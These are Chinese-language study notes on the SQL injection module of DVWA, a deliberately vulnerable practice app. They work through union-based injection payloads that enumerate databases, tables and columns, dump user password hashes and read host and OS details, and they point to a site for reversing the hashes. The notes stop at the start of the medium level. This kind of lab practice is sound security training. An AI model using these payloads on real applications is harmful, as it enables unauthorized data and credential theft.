DVWA-----sql注入模块
concat 把多列结果拼接成一列 中间无间隔符
concat_ws 把多列结果拼接成一列 中间有间隔符
group_concat 把多行结果拼接成一行,
1.show databases;//查看所有数据库
2.select database();//查看当前数据库
3.select schema_name from information_schema.schemata; //查看所有数据库
4.select table_name from information_schema.tables where table_schema='dvwa';//查看数据库dvwa的所有表
5.select column_name from information_schema.columns where table_schema='dvwa' and table_name='users';
//查看数据库dvwa中users表的所有字段
6.select user,password from dvwa.users; //查看用户名和密码的内容
7.select concat(user,password) from dvwa.users; //无间隔符拼接多列结果
8.select concat_ws(0x7e,user,password) from dvwa.users //有间隔符拼接多列结果
9.select group_concat(user,0x7e,password) from dvwa.users; //拼接多行结果为一行,每行以逗号结尾
https://www.cmd5.com/ 加密算法进行反向查询
低级别-
输入 1,页面正常回显数据。
当输入 1’时,页面报数据库参数错误。如图所示,由此可以判断此处注入类型为字符型。
根据报错信息 可以看出构造的闭合条件,可以看出多了一个‘
构造万能密码
输入1 or 1=1 没有列出整个列表
1' or '1'='1 列出整个列表
输入 1' and 1=1 # 回显正确
输入 1' and 1=2# 什么都不显示
得知 构造的闭合为 1‘
首先判断列数
1’ order by x
得知有俩列。
-1' union select 1,2 # ,
判断回显位置
显示当前数据库 -1' union select 1,database() #
爆库 -1' union select 1, schema_name from information_schema.schemata #
爆库 -1' union select 1, group_concat(schema_name) from information_schema.schemata #
拼接多行结果为一行,每行以逗号结束
爆表 -1' union select 1,table_name from information_schema.tables where table_schema='dvwa' #
爆表 -1' union select 1, group_concat(table_name) from information_schema.tables where table_schema='dvwa' #
爆列 -1' union select 1, column_name from information_schema.columns where table_name='users' #
爆列 -1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users' #
爆字段 -1' union select 1, password from dvwa.users #
爆字段 -1' union select 1, group_concat(password) from dvwa.users #
concat 把多列结果拼接成一列 中间无间隔符
concat_ws 把多列结果拼接成一列 中间有间隔符
group_concat 把多行结果拼接成一行,
-1' union select 1, concat(first_name,last_name) from dvwa.users #
-1' union select 1, concat_ws (0x7e,first_name,last_name) from dvwa.users #
-1' union select 1, group_concat(first_name,0x7e,last_name) from dvwa.users #
列出主机名, 数据库路径, 操作系统。
-1' union select 1, group_concat(@@hostname,0x3a,@@datadir,0x3a,@@version_compile_os)#
列出数据库, 当前数据库版本, 最近用户
-1' union select 1, group_concat(database(),0x3a,version(),0x3a,current_user())#
中级
查看源码
$id = mysql_real_escape_string( $id );